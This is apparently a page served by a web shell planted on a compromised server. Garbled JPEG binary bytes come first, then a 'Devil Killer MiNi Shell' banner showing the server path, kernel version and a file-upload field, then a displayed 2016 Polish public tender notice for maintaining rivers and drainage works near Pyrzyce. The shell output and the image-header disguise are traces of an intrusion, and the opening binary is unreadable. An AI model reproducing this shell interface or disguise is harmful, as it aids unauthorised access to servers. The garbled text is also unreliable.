JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160907/305989-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 305989 - 2016
              z dnia 2016-09-07 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Szczecin: "USŁUGA KOMPLEKSOWA - UTRZYMANIE CIEKÓW NATURALNYCH ORAZ URZĄDZEŃ MELIORACJI WODNYCH PODSTAWOWYCH NA TERENIE WOJEWÓDZTWA ZACHODNIOPOMORSKIEGO   TERENOWEGO ODDZIAŁU W PYRZYCACH.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                tak
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zachodniopomorski Zarząd Melioracji i Urządzeń Wodnych w Szczecinie, krajowy numer identyfikacyjny
              103633600000, ul.
              ul. Wyzwolenia 
              105,
              71421  
              Szczecin, woj.
              zachodniopomorskie, państwo
              , tel.
              91 440 51 00, e-mail
              zamowienia@zzmiuw.pl, faks
              91 440 51 01.
              <br />
              Adres strony internetowej (URL): <br /><br />
                Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne
                www.zzmiuw.pl</div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zzmiuw.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>"USŁUGA KOMPLEKSOWA - UTRZYMANIE CIEKÓW NATURALNYCH ORAZ URZĄDZEŃ MELIORACJI WODNYCH PODSTAWOWYCH NA TERENIE WOJEWÓDZTWA ZACHODNIOPOMORSKIEGO   TERENOWEGO ODDZIAŁU W PYRZYCACH.<br /><b>Numer referencyjny: </b>NP/NE/333/45/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.2. Miejsce realizacji: 
Województwo zachodniopomorskie, powiat pyrzycki. 
Zadanie częściowe nr 1 - Rzeka Sicina km 0+000 - 26+908; gmina Pyrzyce, Lipiany; obręb Ryszewo, Brzezin, Turze, Pyrzyce, Nowielin, Mielęcin, Mielęcinek, Batowo.
Zadanie częściowe nr 2 - Rzeka Płonia km 34+165 - 45+210; gmina Przelewice, Warnice, Pyrzyce; obręb Wołdowo, Gardziec, Przywodzie, Karsko, Lubiatowo, Zaborsko, Cieszysław, Okunica.
Zadanie częściowe nr 3 - Struga Cieszysław km 0+000  5+950; gmina Warnice; obręb Cieszysław, Zaborsko, Stary Przylep.
1.3.1 Przedmiotem zamówienia jest wykonanie usług zwanych dalej pracami utrzymaniowymi związanych z utrzymaniem w należytym  stanie technicznym koryt cieków naturalnych i kanałów oraz zlokalizowanych na nich budowli regulacyjnych i urządzeń wodnych stanowiących urządzenia melioracji wodnych podstawowych w celu zapewnienia:
- ochrony przed powodzią, 
- spływu lodu oraz przeciwdziałania powstawaniu niekorzystnych zjawisk lodowych,  
- warunków korzystania z wód w tym utrzymywania zwierciadła wody na poziomie umożliwiającym funkcjonowanie urządzeń wodnych,
- działania urządzeń wodnych, w szczególności ich odpowiedniego stanu technicznego i funkcjonalnego.
Zamówienie obejmuje ponadto sprawowanie nadzoru przyrodniczego, który Wykonawca zapewni przez cały okres realizacji prac, na wszystkich obiektach objętych zamówieniem.
1.3.2 Przewidywane prace utrzymaniowe obejmują:
- wykaszanie roślin z dna oraz brzegów cieków,
- usuwanie roślin pływających i korzeniących się w dnie,
- usuwanie drzew i krzewów porastających dno oraz brzegi,  
- usuwanie przeszkód naturalnych oraz wynikających z działalności człowieka, 
- zasypywanie wyrw w brzegach przez ich zabudowę biologiczną,
- udrażnianie koryt przez usuwanie zatorów utrudniających swobodny przepływ wód oraz usuwanie namułów i rumoszu, 
- remont i konserwację budowli regulacyjnych oraz ubezpieczeń w obrębie tych budowli i urządzeń wodnych,
- rozbiórkę lub modyfikację tam bobrowych oraz zasypywanie nor bobrów w brzegach śródlądowych wód powierzchniowych.
1.3.3 Nadzór przyrodniczy polegał będzie na kontroli i nadzorze nad wykonywanymi pracami utrzymaniowymi w celu zminimalizowania ewentualnych negatywnych skutków oddziaływania prowadzonych prac na środowisko przyrodnicze.
Zakres nadzoru przyrodniczego obejmuje:
- rozpoznanie stanowisk, siedlisk roślin lub zwierząt, miejsc rozmnażania albo czasowego przebywania gatunków chronionych roślin lub zwierząt w granicach obiektu objętego pracami utrzymaniowymi, 
- zaproponowanie działań ochronnych zapobiegających potencjalnym negatywnym skutkom prowadzonych prac,
- kontrola realizacji przez Wykonawcę prac utrzymaniowych, zaleceń ochronnych w przypadku konieczności ich zastosowania,
- sprawozdanie końcowe z przeprowadzonego nadzoru zawierające wyniki prowadzonych obserwacji, opis działań podjętych w celu wyeliminowania potencjalnego, negatywnego wpływu prowadzonych prac na środowisko przyrodnicze, wnioski z podjętych działań oraz ich skuteczność.

Nadzór przyrodniczy prowadzony będzie przez cały okres realizacji prac utrzymaniowych i dokumentowany na kartach nadzoru przyrodniczego  załącznik nr 14 do SIWZ, zawierających opis aktualnie zinwentaryzowanych gatunków chronionych, zalecenia i podjęte działania mające na celu aktywną ochronę gatunków chronionych roślin i zwierząt w trakcie realizowanych prac wraz z dokumentacją fotograficzną stanowisk gatunków chronionych wykonaną przed rozpoczęciem prac, w trakcie i po ich zakończeniu.
Szczegółowe wymagania dotyczące prowadzenia nadzoru przyrodniczego zawarte są w wytycznych wykonania i odbioru prac utrzymaniowych oraz sprawowania nadzoru przyrodniczego - załącznik nr 8 do SIWZ.
1.3.4 Zamówienie zostało podzielone na 3 zadania częściowe.
Szczegółowy zakres i rodzaj prac składających się na przedmiot zamówienia dla poszczególnych zadań częściowych  z podaniem lokalizacji (kilometrażu) określają:
- przedmiary robót wraz z kosztorysami nakładczymi dla każdej części zamówienia - załączniki nr 3.1 ÷3.3 do SIWZ,
- mapy lokalizacyjne - załączniki nr 4.1÷4.3 do SIWZ.
Przedmiot zamówienia ma być wykonany zgodnie z załączonymi przedmiarami robót i kosztorysami nakładczymi - załączniki nr 3.1÷3.3 do SIWZ oraz wymaganiami zawartymi w wytycznych wykonania i odbioru prac utrzymaniowych oraz sprawowania nadzoru przyrodniczego - załącznik nr 8 do SIWZ.
W ofercie należy uwzględnić koszt objęcia prowadzonych prac nadzorem przyrodniczym.
1.4. Wykaz zadań częściowych objętych zamówieniem:  
1.4.1. Zadanie częściowe nr 1  Rzeka Sicina km 0+000  26+908
Długość cieku objęta utrzymaniem 25,4 km 
Zakres prac:
- ręczne wykoszenie porostów ze skarp pasem szer. 6 m; koszenie jednostronne w km 0+000-1+820, koszenie obustronne w km 1+820  26+908,
- wygrabienie wykoszonych porostów,
- ręczne ścinanie i karczowanie krzaków porastających dno i skarpy  0,3 ha, 
- zrębkowanie gałęzi ze ściętych krzaków,
- oczyszczenie z namułu przepustów ramowych 2x2m  57 m,
- hakowanie roślinności korzeniącej się w dnie; usuwanie przymulisk w km 0+000-26+908, w km 0+000-1+820 połową koryta,
- usuwanie wywrotów drzew leżących na skarpach cieku  4 szt.,
- ręczne usuwanie namułu warstwą 0,3m w km 10+150  10+250,
- wykonanie opasek pojedynczych z kiszek faszynowych o śr. 20cm, jednostronnie (prawy brzeg) na dł. 350 mb w km 22+350-22+700,
- wykonanie koryta pod ubezpieczenie z kiszek faszynowych.
1.4.2. Zadanie częściowe nr 2 - Rzeka Płonia km 34+165 - 45+210
Długość cieku objęta utrzymaniem 11,045 km
Zakres prac:
- oczyszczenie dna z zanieczyszczeń w km 34-165-45+210,
- ręczne wykoszenie porostów ze skarp pasem szer. 10 m; koszenie jednostronne w km 34+165-45+210,
- wygrabienie wykoszonych porostów,
- ręczne ścinanie i karczowanie krzaków porastających dno i skarpy  0,1 ha,
- zrębkowanie gałęzi ze ściętych krzaków,
- oczyszczenie z namułu przepustów ramowych 2x2m  40 m,
- usuwanie skoszonych roślin z dna cieku za pomocą koparki.
1.4.3. Zadanie częściowe nr 3 - Struga Cieszysław km 0+000 - 5+950
Długość cieku objęta utrzymaniem 5,950 km
Zakres prac:
- ręczne wykoszenie porostów ze skarp pasem szer. 6 m,
- wygrabienie wykoszonych porostów,
- ręczne ścinanie i karczowanie krzaków porastających dno i skarpy  0,3 ha,
- zrębkowanie gałęzi ze ściętych krzaków,
- oczyszczenie z namułu przepustów rurowych o śr. 1,0 m  16 m.
<br /><br /><b>II.5) Główny kod CPV: </b>77310000-6<br /><b> Dodatkowe kody CPV:</b>90721800-5,
                45246000-3,
                90500000-2,
                71313000-5<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/11/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b>*(maksymalny termin realizacji, do którego Zamawiający wymaga aby przedmiot zamówienia został zakończony)
Datą wykonania przedmiotu umowy jest dzień podpisania przez przedstawiciela Zamawiającego protokołu odbioru końcowego przedmiotu umowy.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                sytuacji finansowej lub ekonomicznej gwarantującej należyte wykonanie zamówienia tj.: są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego na wartości nie mniejsze niż dla zadań częściowych: 
nr 1  Pyrzyce I 200.000,00 zł brutto (dwieście tysięcy złotych i 00/100)
nr 2  Pyrzyce II 50.000,00 zł brutto (pięćdziesiąt tysięcy złotych i 00/100)
nr 3  Pyrzyce III 50.000,00 zł brutto (pięćdziesiąt tysięcy złotych i 00/100)

Zamawiający może, na każdym etapie postępowania, uznać że wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.  

UWAGA!
1. W sytuacji, gdy Wykonawca polega na zdolnościach lub sytuacji innego podmiotu zobowiązany jest udowodnić Zamawiającemu, iż realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów niezbędnymi w trakcie realizacji zamówienia. 
2. W tym celu Wykonawca musi przedstawić Zamawiającemu pisemne zobowiązanie tych podmiotów do oddania do jego dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia  zgodnie z załącznikiem nr 2c do SIWZ.
3. W przypadku zmiany lub rezygnacji z podwykonawcy na którego zasoby Wykonawca się powołuje Wykonawca jest zobowiązany wykazać Zamawiającemu iż proponowany inny podwykonawca  lub Wykonawca samodzielnie  spełnia warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w postępowaniu. 
4.Zamawiający oceni, czy udostępniane wykonawcy przez inne podmioty zdolności techniczne lub zawodowe, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 1323 i ust. 5. 
5.W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane. 
6. Jeżeli zdolności techniczne lub zawodowe podmiotu, o którym mowa w ust. 1 nie potwierdzają spełnienia przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, zamawiający żąda aby wykonawca w terminie określonym przez zamawiającego:
1) zastąpił ten podmiot innym podmiotem lub podmiotami lub
2) zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolności techniczne luz zawodowe, o których mowa w ust. 1.
7. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane.
8.Wykonawca który polega na sytuacji finansowej lub ekonomicznej innych podmiotów odpowiada solidarnie z  podmiotem który zobowiązał się do udostępnienia zasobów, za szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów ,chyba że za nieudostępnienie zasobów nie ponosi winy.
9.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający wymaga aby przynajmniej jeden z Wykonawców spełniał lub wspólnie spełniali warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej. W przypadku warunku dotyczącego sytuacji ekonomicznej lub finansowej, oceniana będzie ich łączna sytuacja ekonomiczna.

Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w oświadczeniach i dokumentach złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                zdolności technicznej lub zawodowej potwierdzonej:
a) należytym wykonaniem co najmniej 2 usługi polegające na utrzymaniu i konserwacji urządzeń melioracji wodnych oraz 2 usługi polegające na utrzymaniu cieków naturalnych, w tym co najmniej jednej usługi polegającej na utrzymaniu i konserwacji urządzeń melioracji wodnych oraz co najmniej jednej usługi polegającej na utrzymaniu cieków naturalnych na kwotę nie mniejszą niż:
dla zadania częściowego: 
nr 1  Pyrzyce I 100.000,00 zł brutto (sto tysięcy złotych i 00/100)
nr 2  Pyrzyce II 50.000,00 zł brutto (pięćdziesiąt tysięcy złotych i 00/100)
nr 3  Pyrzyce III 30.000,00 zł brutto (trzydzieści tysięcy złotych i 00/100), w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie.
b) dysponowaniem przez Wykonawcę, co najmniej jedną osobą posiadającą co najmniej trzyletnie doświadczenie zawodowe w kierowaniu pracami w zakresie inżynierii hydrotechnicznej.
c) dysponowaniem co najmniej jedną osobą zdolną do wykonania zamówienia, posiadającą doświadczenie, wykształcenie i kwalifikacje zawodowe odpowiednie do stanowisk, jakie zostaną jej powierzone tj.: osobą legitymującą się wykształceniem wyższym o kierunku biologia lub ochrona środowiska lub pokrewne i doświadczeniem, tj. sprawowaniem co najmniej jednego nadzoru przyrodniczego rozumianego jako kontrola nad sposobem i terminem realizacji działań odpowiadających rodzajowi działań objętych przedmiotem zamówienia lub wykonaniem monitoringu przyrodniczego lub inwentaryzacji przyrodniczej związanej z realizacją inwestycji z zakresu budownictwa wodno-melioracyjnego.
Warunek dotyczy wszystkich zadań częściowych.
Zamawiający może, na każdym etapie postępowania, uznać że wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.  

UWAGA!
1. W sytuacji, gdy Wykonawca polega na zdolnościach lub sytuacji innego podmiotu zobowiązany jest udowodnić Zamawiającemu, iż realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów niezbędnymi w trakcie realizacji zamówienia. 
2. W tym celu Wykonawca musi przedstawić Zamawiającemu pisemne zobowiązanie tych podmiotów do oddania do jego dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia  zgodnie z załącznikiem nr 2c do SIWZ.
3. W przypadku zmiany lub rezygnacji z podwykonawcy na którego zasoby Wykonawca się powołuje Wykonawca jest zobowiązany wykazać Zamawiającemu iż proponowany inny podwykonawca  lub Wykonawca samodzielnie  spełnia warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w postępowaniu. 
4.Zamawiający oceni, czy udostępniane wykonawcy przez inne podmioty zdolności techniczne lub zawodowe, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 1323 i ust. 5. 
5.W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane. 
6. Jeżeli zdolności techniczne lub zawodowe podmiotu, o którym mowa w ust. 1 nie potwierdzają spełnienia przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, zamawiający żąda aby wykonawca w terminie określonym przez zamawiającego:
1) zastąpił ten podmiot innym podmiotem lub podmiotami lub
2) zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolności techniczne luz zawodowe, o których mowa w ust. 1.
7. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane.
8.Wykonawca który polega na sytuacji finansowej lub ekonomicznej innych podmiotów odpowiada solidarnie z  podmiotem który zobowiązał się do udostępnienia zasobów, za szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów ,chyba że za nieudostępnienie zasobów nie ponosi winy.
9.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający wymaga aby przynajmniej jeden z Wykonawców spełniał lub wspólnie spełniali warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej. W przypadku warunku dotyczącego sytuacji ekonomicznej lub finansowej, oceniana będzie ich łączna sytuacja ekonomiczna.

Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w oświadczeniach i dokumentach złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
